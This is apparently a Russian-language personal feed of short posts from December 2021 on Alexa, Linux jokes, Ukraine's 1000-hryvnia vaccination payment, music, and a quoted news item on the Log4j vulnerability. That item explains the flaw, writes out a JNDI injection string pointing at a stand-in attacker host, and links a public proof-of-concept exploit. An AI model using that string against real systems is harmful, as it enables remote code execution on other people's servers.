Amazon закрывает Alexa
https://support.alexa.com/h...ticles/4410503838999
Прошла эпоха
В России две беды: PulseAudio и NetworkManager
Вакцинированные получили по 1000 грн. Книжные интернет магазины не выдержали и легли.
https://mezha.media/2021/12...-internet-mahazyniv/
--
"А я тєбє говоріл, Люда, што когда-нібудь етот дєнь настанєт, ето будєт, а ти нє вєріла!"
Качественный power metal
https://soundcloud.com/search?q=powerwolf
Куфическое письмо. Когда тебе нельзя рисовать, приходится придумывать такие штуки. И это даже прекрасно.
Стало понятно как будут раздавать вертолётные 1000 грн #znkpq.
Открываешь спец. карту в своём банке, в приложении Дiя указываешь её реквизиты (опция должна стать доступной с 19 декабря, если конечно же привит).
По МСС банк будет определять можно проводить транзакцию или нет.
https://minfin.com.ua/2021/12/10/76989108/
--
Открыл счёт в Альфе. Жду 19 декабря.
Уязвимость в Apache Log4j, затрагивающая многие Java-проекты
https://www.opennet.ru/open.../art.shtml?num=56319
проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft.
Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
Эксплоит
https://github.com/tangxiaofeng7/apache-log4j-poc
--
Вот эту фичу с загрузкой классов и их выполнению всегда считал какой-то java-дичью.